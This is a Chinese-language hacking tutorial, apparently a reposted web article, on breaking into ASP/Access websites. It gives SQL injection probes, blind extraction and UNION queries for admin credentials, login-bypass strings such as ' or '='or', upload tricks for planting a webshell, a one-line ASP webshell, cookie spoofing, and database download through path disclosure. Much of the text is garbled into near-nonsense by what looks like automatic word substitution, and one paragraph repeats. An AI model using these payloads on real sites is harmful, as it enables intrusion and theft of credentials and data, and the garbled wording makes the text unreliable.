SQL注入

本文由zoujialan贡献
一律、注入点的论断及猜解
1.加盟单引号 ’提交,
结果:如果出现错误提示,则该网站可能就是有注入漏洞。
2.数字型判断是否出渗;
语句:and 1=1 ;and 1=2 (经典)、’ and ‘1’=1(字符型)
结果:分别返回不同之页面,说明存在注入漏洞.
解析:and 的意是“和”如果没有过滤我们的言辞,and 1=1就算见面为代入SQL查询语句进行查询,
设若and前后的鲜长条告句子都是当真的言辞虽未会见拧,但如果前后语句有一个为假的话,程序即使会暴错。
呢尽管标明程序来渗漏洞
严防注入解决办法:
1>使用or 2>1 ; or 1>2来开展判断
  结果:分别返回不同之页面,说明在注入漏洞.
  分析:or注入只要求前后两独话如果出一个科学就也实在,如果前后两只告知词都是正确的,反而为
假。
   记住:or注入时,or后面的语如果是不易的,则归错误页面!如果是错误,则赶回正确页面
,说明在注入点。
2> 使用xor 1=1; xor 1=2
   结果:分别返回不同的页面,说明在注入漏洞.
   分析:xor 代表正在异或,意思就是连续的表达式仅发生一个也真时候才为实在。
   记住:xor注入时,xor后面的讲话如果是科学的,则赶回错误页面积,如果是荒谬,则回正确
页面,说明有注入点。
3>把and 1=1易成为URL编码形式后当付给
  and 1=1 URL编码:%41%4E%44%20%%31%3D%31
4>使用-1;-0
  分析:如果回到的页面和前边不同,是别一样虽然新闻,则表示来渗漏洞,是数字型的流入漏洞;在 
URL地址后长 -0,URL变成 news.asp?id=123-0,返回的页面及眼前的
页面相同,加上-1,返回错误页面,则也代表有注入漏洞.
3.字符型判断是否发生渗:
  语句:’ and ‘1’=1;’ and  ‘1=2(经典)
  结果:结果:分别返回不同之页面,说明有注入漏洞.
  分析:加入’ and ‘1’=1回来正确页面,加入’ and  ‘1=2返错误页面,说明有渗漏同。
  防注入解决办法:
  1>在URL的地方后长’%2B’(字符型)
  分析:URL地址变为:news.asp?id=123’%2B’,返回的页面和1及;加
上’2%2B’asdf,URL地址变为:news.asp?id=123’%2Basdf,返回的页面及1
不等,或者说非察觉该永记下,或者不当,则意味在注入点,是文本型的。
4.搜索型判断是否有渗:
简易的判断搜索型注入漏洞存在无有的方是先期搜索’,如果差,说明90%是这漏洞。然后搜
索%,如果正常返回,说明95%发洞了。
说明:加入如”&;”、”[“、”]”、”%”、”$”、”@”等特殊字符,都可以实现,如果起谬误,说明有题目
操作:
找一个重中之重字,比如2006咔嚓,正常返回所有2006相关的消息,再找2006%’and 1=1 and ‘%’=’和
2006%’and 1=2 and ‘%’=’,存在异议的话,就是100%起洞了。
关键字%’ and 1=1 and ‘%’=’%
关键字%’ and 1=2 and ‘%’=’%
以and 1=1 换成注入语句就可了
5.判断数据库类型:and user>0  例如:showdetail.asp?id=49 ;and user>0 
如若是ACCESS数据库,那么回的左里一般会来”Microsoft JET Database”关键自然,如果是MSSQL数
据库底语返回的一无是处提示里一般会蕴藏”SQL Server”关键了.
6.猜表名 and exists (select * from 表名)
  说明:意思和方一样,只是用的语名不均等。
7.猜列名 and (select count(列名) from 表名)>0
  说明:如果我们输入的列名猜解正确也反回正常页面
8.猜长度 and (select top 1 len(username) from admin)>0
  说明:如果我们输入的末段一个数据返回错误,而不当前同位数字返回正确,说明自身所猜解的长短
为正确。
9.猜内容 and (select top 1 asc(mid(username,1,1)) from admin)>50 ascii码1-128
  说明:如果我们输入的末段一位数据返回错误,而不当前无异各类数字返回正确,说明自己所猜解的数字
没错。(可以动用折半法猜内容)
折半法:最小值与极端酷值差的一半,比如输入50返正确,输入100归错误,折半后输入75。
10.手拉手查询注入(union查询)
操作步骤:
1>在正常说话后台加入 and 1=2 union select * form 表名,其中*声泪俱下表示字段数量,从1一直增加
(and 1=2 union select 1,2,3,4 form 表名)如果字段往往是就会见发暴错。
2>在页面显示数字之地方因此真实得的字段名代替,如:username,password.
3>在页面字段值处暴出真的数据库字段值。
亚、查找后台地址,找到后台用赢得的用户管理员的帐户与密码进行摘登陆.
三、上传WEBSHELL
方要发生:
1.高达污染漏洞: 如果看:选择你如果达成污染之文书 [重上污染]要么出现“请登陆后用”,80%不怕闹尾巴
了! 有时上传不一定会马到成功,这是为Cookies不一样.我们将用WSockExpert取得Cookies.再就此 
DOMAIN上传或是桂林红军上传工具.
1>上传漏洞的文本
  动网是upfile.asp。
  动易是以upfile_soft.asp,(软件达到传漏洞)upfile_softpic.asp(图片及传漏洞)
  动感是当uploadflash.asp,upfile_flash.asp,利用抓包工具抓包拿走cookies,再就此   DOMAIN上
传或是桂林红军上传工具
2>添加上传类型
  asa|asaspp
3>就是于达标传时在后缀后面加空格或者加几触及,也许也会见生出异的意识。例:*.asp ,*.asp..。
4>上污染图片文件木马,使用备份数据库得到asp文件
2.cookies欺骗
  使用cookies可以达成让网站认识您的目的。但是若cookies验证不足就见面形成cookies欺骗。用  
交工具 桂林老兵cookies欺骗工具。
3.%5c暴库
  把二级目录中的/换成%5c EY:otherweb … s.asp?BigClassName=职
责范围&;BigClassType=1 若你能够观看:’E:\ahttc040901
\otherweb\dz\database\iXuEr_Studio.asa’不是一个管用的 路径。 确定路径名称拼写是否是,
和是否 连接到文件存放的服务器。 这样的就算是数据库了。下载时用FLASHGET换成.MDB格式的尽管推行

4.conn.asp暴库
  这个邪是于一直的漏洞,利用价值不殊
5.’or’=’or’万能够密码登陆
  ’or’=’or’这是一个得连续不断SQL的语名句.可以直接入后台。我采访了瞬间。类似的还有 : 
  ’or’’=’ ” or “a”=”a ’) or (’a’=’a “) or (“a”=”a or 1=1– ’ or ’ a’=’a  
  一个不行老的用方式,主要用来一些于一直的网站。
6.任何流淌,也就算是超越站. 我们入侵某站时或者这站坚固的无懈可击,我们可搜寻下与是站同一服务
尊重的站点,然后以利 用是站点用提权,嗅探等办法来侵犯我们 要入侵的站点。,在这边产生个困难
,就是部分服务器 的绝对路径经过加密,这就算扣留我们的本事了 
7.写入ASP格式数据库。就是平等词话木马[〈%execute request(“value”)%〉 ],常用在留言本. 如:
这就是是ASP格式的数据库或者好描绘副内容的
ASP文件,如南方数据的体系部署],再写 入一句子话木马.
8.旁注,也就是是超站. 我们入侵某站时可能是站坚固的无懈可击,我们得以找下与夫站同一服务
重视的站点,然后在利 用之站点用提权,嗅探等艺术来侵犯我们 要入侵之站点。,在此地发出只困难
,就是局部劳务器 的绝对路径经过加密,这就算扣留咱们的本事了
季、整站利用
    动网BBS 可以预先用:dvbbs权限提升工具,使从曾改为前 
   台管理员。 THEN,运用:动网固顶贴工具,找个固顶贴,再获得COOKIES,这个只要而于曾举行。我   
等好就此 WSockExpert取得Cookies/NC包 这个自己哪怕非开了,网上教程多的凡,自曾生单省。     
工具:dvbbs权限提升工具 动网固顶贴工具
总结:
村办觉得ACCESS网站注比不是死灵敏,方法大家都知晓,针对国内的网站的话大家好交网站搜索
网站是运用什么顺序改过来的,现在相像都是用曾存在的柜网站体系来拓展改动。

下同样首整理MSSQL注入方法,MSSQL注入十分底利落,功能吗特意强大.只要找到注入点,一般
场面下是好拿下来的,

相关文章